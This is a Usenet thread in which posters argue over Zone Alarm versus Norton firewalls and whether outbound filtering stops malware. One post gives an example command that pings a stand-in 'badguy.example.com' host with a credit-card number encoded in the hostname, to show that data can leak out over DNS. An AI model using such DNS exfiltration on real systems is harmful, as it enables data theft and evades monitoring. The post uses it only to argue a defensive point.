Norton vs Zone Alarm firewalls

In comp.security.firewalls RalfG wrote:
"Gerald Vogt" wrote:
RalfG wrote:
firewall may have the ability to block -any- application from
sending email without explicit approval. Monitoring outbound traffic
also entails

Still, any application can send email without explicit approval if it
really wants to. That's the point which is usually not mentioned.

In your preferred setup nothing prevents emails from being sent. With
an appropriate firewall the firewall can block emails from being sent
without user intervention.

The user's mail client is allowed to send mail. %OTHER_PROGRAM% utilizes
the user's mail client to send mail. How does the firewall prevent that?

No, trying to intercept IPC and then let the user decide is not an
option, because that kind of decision is *way* over a normal user's
head.

differentiating the legitimate processes from suspicious ones or
spoofs. All firewalls are not equal, but if the firewall is doing
the job well it's not enough for a process to pretend to be
"iexplore.exe" in order to pass the firewall, it has to be
c:\program files\internet explorer\iexplore.exe, with additional
identifying information, be it a specific version number, CRC etc.
etc..

An what keeps the malware from using the original IE to send out its
data?

In your setup nothing, with many firewalls nothing as well, however
there are firewalls which do monitor all processes that try to start
other processes.

There's exactly no need at all to do that. Software Restriction Policies
already allow to define which programs may or may not be executed.

Viruses aren't smart, they're all constrained to operating within
specific program parameters. Some are more cleverly written than
others but the vast majority have already been beaten.

Yes. But that's all. A single little bit cleverer malware sends out
your credit card number through DNS. Your firewall does not help. It
does not recognize it. You still need more effective means to protect
your data which no security suite can provide.

You're basing your argument on a hypothetical malware and deficient AV
and firewall apps. Sorry, that strawman logic doesn't work. One of the
reasons for monitoring outbound traffic is precisely to stop
unrecognized processes from making connections, either to the internet
or to other nodes on a LAN.

Instead of restricting the communication of unrecognized processes you
want to prevent unrecognized processes from being started in the first
place. That's what AV software and SRP do.

Firewall X might do this better than Firewall Y, Firewall Z might not
do it at all. Y may not be as good a firewall as X but it is still
better than Z, and even Z is better than nothing at all.

Wrong, because this neglects the existence of exploitable bugs and
design flaws in the firewall software as well as the possibility of
intelligent malware.

Anyway this thread seems to be missing the point. It's analagous to
saying that we shouldn't bother using crosswalks or crossing at the
lights because it is always possible that some idiot driver might
ignore the signals and run us down anyway. One side (anti-security)
says avoid the problem by never crossing a street, the other side
(pro-security) says use due caution and

No. That is the wrong analogy. Noone ever said you can never cross
the street.

You say you have to install security firewall, i.e. you have to cross
the street with the security installed, i.e. at the lights. You must
not cross the street at any other place (i.e. without security)
because you will be killed, i.e. it is impossible to cross the
street at any other place except at the lights.

I never suggested certainty. The whole computer security issue is
about probabilities.

No. Computer security is about reliability. Which may very well be based
on probabilities, but only if you have some hard numbers. Which numbers
are the probabilities you're talking about based on?

There is a greater probability of being hit by traffic if you don't
use the crosswalks just as there is a greater probability of falling
victim to malware if you don't use security software.

Pointless, unless you are able to quantify that.

cu
59cobalt
--
"If a software developer ever believes a rootkit is a necessary part of
their architecture they should go back and re-architect their solution."
--Mark Russinovich

RalfG wrote:
"Gerald Vogt" wrote in message
...
RalfG wrote:
It doesn't need to be a virus. I did encounter that one time when
accessing a web page unexpectedly triggered OE and the firewall blocked
it. A
Which means again you went to that web page to start with. It was your
action which brought you there.

Normal usage of the computer for browsing, yes. Staying off of the internet
is almost certainly the best way to avoid trouble but that's just a tad self
defeating.

I'll never understand why many people also jump to the "stay of the
internet". No one said so. It is your conclusion that it is inevitable
to come to such "bad" web pages. And that is simply not true. You can
browse the internet and with still avoid most of those pages.

firewall may have the ability to block -any- application from sending
email without explicit approval. Monitoring outbound traffic also entails
Still, any application can send email without explicit approval if it
really wants to. That's the point which is usually not mentioned.

In your preferred setup nothing prevents emails from being sent. With an
appropriate firewall
the firewall can block emails from being sent without user intervention.

Yes. The firewall may be able to block emails from send with OE without
user intervention.

It cannot prevent some malware to put some mails into the outbox which
is send out the next time the user sends something out.

And it cannot prevent some malware sending out e-mail or other data
bypassing the firewall. If you want to get something out you'll get it
out even with the firewall in place.

differentiating the legitimate processes from suspicious ones or spoofs.
All firewalls are not equal, but if the firewall is doing the job well
it's not enough for a process to pretend to be "iexplore.exe" in order to
pass the firewall, it has to be c:\program files\internet
explorer\iexplore.exe, with additional identifying information, be it a
specific version number, CRC etc. etc..
An what keeps the malware from using the original IE to send out its data?

In your setup nothing, with many firewalls nothing as well, however there
are firewalls
which do monitor all processes that try to start other processes.

Many people have a browser running at all times. You don't need to start
a process. You just have to make the other process do what you want.
That's not so awfully difficult.

Viruses aren't smart, they're all constrained to operating within
specific program parameters. Some are more cleverly written than others
but the vast majority have already been beaten.
Yes. But that's all. A single little bit cleverer malware sends out your
credit card number through DNS. Your firewall does not help. It does not
recognize it. You still need more effective means to protect your data
which no security suite can provide.

You're basing your argument on a hypothetical malware and deficient AV and
firewall apps. Sorry, that strawman logic doesn't work. One of the reasons
for monitoring outbound traffic is precisely to stop unrecognized processes
from making connections, either to the internet or to other nodes on a LAN.

Again. IE, OE, and other installed applications on your computer are not
unrecognized processes. ping for example is a standard application. You
can simply enter

ping VISA12341234123412340108RalfGGG.badguy.example.com

And here goes your credit card... You'll never notice. At the same time
you run another process which you let get caught by the firewall to make
the user think it is all safe and he can continue...

I don't have to use unrecognized processes to send data.

And even "unrecognized processes" can trick the firewall.


Firewall X might do this better than Firewall Y, Firewall Z might not do it
at all. Y may not be as good a firewall as X but it is still better than Z,
and even Z is better than nothing at all.

Good at blocking software you have installed and use to communicate: yes.

Good at blocking malware effectively: no.

You say you have to install security firewall, i.e. you have to cross the
street with the security installed, i.e. at the lights. You must not cross
the street at any other place (i.e. without security) because you will be
killed, i.e. it is impossible to cross the street at any other place
except at the lights.

I never suggested certainty. The whole computer security issue is about
probabilities. There is a greater probability of being hit by traffic if you
don't use the crosswalks just as there is a greater probability of falling
victim to malware if you don't use security software.

This is just plain wrong. I am far more safe if I open my eyes and make
sure that it is safe to cross the street then to rely on traffic lights.

Thus, why would you tell everybody to use the lights and it is
absolutely essential to use the lights when there is a far more
effective and safer method?

you from being killed if all you do is to cross the street at the lights
and never looking to the right or left. If you just start to walk when
it's green you'll be eventually killed. There are a lot of nice drivers
who stop at their red light but eventually you'll meet the one who does
not.

The alternative is not to rely on the lights. Don't trust the lights. The
effective security is to switch on your brain and protect yourself looking
to the left and right and making sure yourself it is safe to cross the
street at this time and at this place. This effectively

You just described using due caution.

Which is far more effective security.

That's the correct analogy if you want to use the "lights". Noone ever
said you cannot cross the street. On the contrary. (I already know how you
will now adjust your analogy but...)

There's no need to adjust my analogy. You haven't yet made a compelling
argument in favour of your position.. and I doubt that accident statistics
will support your contentions either.

You started that analogy. I did not adjust it. You described it wrong.

The goal was to cross the street.

You use security software as aid just like traffic lights are a aid for
that.

I say you don't need the lights. You don't need the security software.

It is useless to discuss your analogy if you want the analogy to be that
not using security software equals not crossing the street. Because you
mix the aim with the tool which is supposed to help.

cross with the lights. I use a firewall mainly to keep
unauthorised -people- out of my PC, AV and AS software to keep out or
kill malicious software.
Anything that comes on to your computer first of all got there because of
your action, i.e. your "invitation". But none of the security suites
really deals with this fact nor

Blaming the victim?

Yes. If a person refuses to learn about security. If a person thinks it
only has to install a software suite to protect your computer. If a
person thinks with security suite in place everything is done which one
can possibly do to have security. If someone wants to dig in the dirt
he'll get dirty. If you are concerned about the security of your
computer and data you'll learn rules how to keep secure.

Gerald

My Zone Alarm Pro firewall subscription expires in a few days and I
recently bought a Norton Internet Security 2008 package that contains a
firewall.
I currently have the Norton firewall turned off and just use the Zone
Alarm Pro firewall.
I don't use the Win XP firewall because I heard that it's not a good idea
to have several firewall on at the same time.
We get internet through a Belkin pre-N wireless router that is supposed to
have some sort of firewall built in and that one is turned on.
My computer connects to the router with an ethernet cable and my son's
computer uses a Belkin N usb wireless adapter. They both have the same
current setup I describe regarding firewalls.
Can anyone please advise on whether the Zone Alarm Pro firewall is any
better than the Norton firewall in my situation?
Should I renew the Zone Alarm Pro subscription or uninstall it when it
expires and turn on the Norton firewall?
Thanks for any advice.

Specifically with regard to your question I think an important part of the
answer is which firewall software you are more comfortable with. By that I
mean which product's interface and features make the most sense? Firewalls
have many features which can be often be configured in multiple ways. The
more you understand the product the more likely you will configure it
optimally and get the best protection. Zone Alarm is a good choice if you
want to be involved. On the other hand, some folks prefer security software
that requires as little user interaction as possible and the Norton products
are a good choice in that case because by default they handle a lot of the
decision making. I'm not familiar with the firewall included in NIS 2008 so
I can't comment specifically on it, but it did get a very good review at
pcmag.com. Hope this helps.

"Kayman" wrote in message
...

It is important that administrators follow the rule of least privilege.

Definitely.

"Ansgar -59cobalt- Wiechers" wrote in message
...
In comp.security.firewalls RalfG wrote:
"Gerald Vogt" wrote:
RalfG wrote:

One of the
reasons for monitoring outbound traffic is precisely to stop
unrecognized processes from making connections, either to the internet
or to other nodes on a LAN.

Instead of restricting the communication of unrecognized processes you
want to prevent unrecognized processes from being started in the first
place. That's what AV software and SRP do.


I think you are both correct. Doing both makes it more difficult for
malicious software to work. Doing one without the other can be a
vulnerability.


Note: I am sorry that I had to add the other newsgroups back into the list
of recipients of this, but I am unable to send to just
comp.security.firewalls.

"Gerald Vogt" wrote in message
...

It cannot prevent some malware to put some mails into the outbox which is
send out the next time the user sends something out.

Outlook Express won't send anything without some user involvement. In the
past, it was possible for unauthorized software to spread themselves in the
manner you describe but now Microsoft does not allow it. Certainly there is
potential for sophisticated software to bypass such things, but if it were
as easy as you say, we would sure hear about it.

Windows, at least prior to Vista, is surprisingly vulnerable to software
that is allowed to execute in a system. It is so vulnerable that it is
nearly impossible to make a system totally safe from software running in a
system. There are many ways for software to inject a DLL or other code into
another process. Good antivirus software will catch most of those, and
detection of injection is a critical way to catch most malicious software
and that is how antivirus software might also catch many valid utility
software.

Regardlous, use of OE in the manner you describe is not as easy as you
indicate.